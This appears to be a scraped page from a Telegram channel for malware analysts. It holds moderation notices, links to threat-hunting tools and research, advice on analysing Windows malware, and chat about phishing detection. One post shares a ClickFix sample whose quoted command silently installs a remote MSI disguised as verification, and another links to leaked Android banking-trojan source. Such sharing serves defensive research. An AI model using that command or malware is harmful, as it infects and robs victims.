malwareresearch | Unsorted

Telegram-канал malwareresearch - Malware Research

9373

Group for Malware Analysts. Pinned message with resources and rules: https://t.me/MalwareResearch/38033

Subscribe to a channel

Malware Research

User 得到 has 1/3 warnings; be careful!
Reason:
stay on topic

Читать полностью…

Malware Research

/fban @too_bobotie

Читать полностью…

Malware Research

Here is the video showing how Garuda can perform AI powered threat hunting when integrated with LLMs:
https://youtu.be/Sk_c5w1CEiY

Читать полностью…

Malware Research

https://github.com/vxunderground/MalwareSourceCode/tree/main/Android/Android.Ermac.3

Читать полностью…

Malware Research

May I ask to download this file from VT? Thanks a lot
https://www.virustotal.com/gui/file/175d4adc5fc0b0d8eb4b7d93b6f9694e4a3089e4ed4c59a2828d0667a9992aaa/detection

Читать полностью…

Malware Research

the code that will download the first zipped file

Читать полностью…

Malware Research

seems like the final downloads not available

2 zipped files

Читать полностью…

Malware Research

New FedBan
Fed: Libra's Empire
FedAdmin: alex 27
User: Crypto Rex
User ID: 7864280650
Reason: spam

Читать полностью…

Malware Research

https://www.microsoft.com/en-us/research/blog/project-ire-autonomously-identifies-malware-at-scale/

Project Ire, automates what is considered the gold standard in malware classification: fully reverse engineering a software file without any clues about its origin or purpose. It uses decompilers and other tools, reviews their output, and determines whether the software is malicious or benign

Читать полностью…

Malware Research

REMnux is a good distro btw

Читать полностью…

Malware Research

User ~❤️ has 1/3 warnings; be careful!
Reason:
stay on topic

Читать полностью…

Malware Research

Any recommendation on how to analyze a windows malware detected and I want to analyze its behavior

Thanks

Читать полностью…

Malware Research

So does it automatically assume any pdf with qr in it as phishing?

Читать полностью…

Malware Research

Have to test ms defender against qishing

Читать полностью…

Malware Research

Yeah. Quite unlike almost a decade or two ago...

Читать полностью…

Malware Research

New FedBan
Fed: Libra's Empire
FedAdmin: alex 27
User: Beatriz Arcos
User ID: 7357787293
Reason: None given.

Читать полностью…

Malware Research

New FedBan
Fed: Libra's Empire
FedAdmin: alex 27
User: Olympia Miller
User ID: 8233018498
Reason: smap

Читать полностью…

Malware Research

I’m excited to share that At DEF CON, I released the Garuda Threat Hunting Framework — a tool designed to empower defenders with manual threat hunting and detection capabilities.

Explore the framework: https://github.com/monnappa22/Garuda-framework

In case you missed it: Garuda can also be integrated with LLMs to perform AI-powered autonomous threat hunting.

Watch the demo here: https://youtu.be/Sk_c5w1CEiY

Читать полностью…

Malware Research

Is this the source of emarc ? If so, it is on vx underground

Читать полностью…

Malware Research

oh well. same problem

Читать полностью…

Malware Research

yes
sometimes country ip and other factors restrictions (usaully redireted to google.com)

Читать полностью…

Malware Research

User Александр has 1/3 warnings; be careful!
Reason:
read rules

Читать полностью…

Malware Research

Click Fix samples via telegram mini apps ( fake safeguard )

sample:

/channel/OxAA_Science_tg/4


copied command:
cmd /c start msiexec /q /i https://b9w2.top/safeguard.msi & rem [✓] Alternate Verification Telegramㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ

https://www.virustotal.com/gui/file/858633afb69adc5b52ae9d2427593954584452fa2c3a5f153a01a4582ac843d1/detection


final urls inside msi:
https://o5e.pages.dev/?g=1298
https://o5e.pages.dev/?g=981

Читать полностью…

Malware Research

Thanks folks I used hybrid analysis as I was in rush for more context but I will discover those options

Читать полностью…

Malware Research

New FedBan
Fed: Libra's Empire
FedAdmin: alex 27
User: 𝙂⚡𝙧𝙤 𝙂𝙝𝙤𝙨𝙩
User ID: 5342471938
Reason: spam

Читать полностью…

Malware Research

Get a VM. Install monitoring and analysis tools (procmon, procexplorer, autoruns, wireshark, rootkit unhooker - or any alternatives of your choice). Account for antisandbox/antidebug as well as the execution chain and detonate the payload. You should see the behaviour in monitoring tools. You might also want to take a memory dump of the system or specific proccesses.

Читать полностью…

Malware Research

But the ones it caught, are really phishing

Читать полностью…

Malware Research

It floods the SIEM with so many cases after it auto zaps them 😏

Читать полностью…

Malware Research

Speaking of which, after MS disabled macros by default, there are hardly any Office documents to analyze

Читать полностью…

Malware Research

MS Defender is surprisingly good at detecting the former that I don't have to do anything. I feel my job is at risk 👀

Читать полностью…
Subscribe to a channel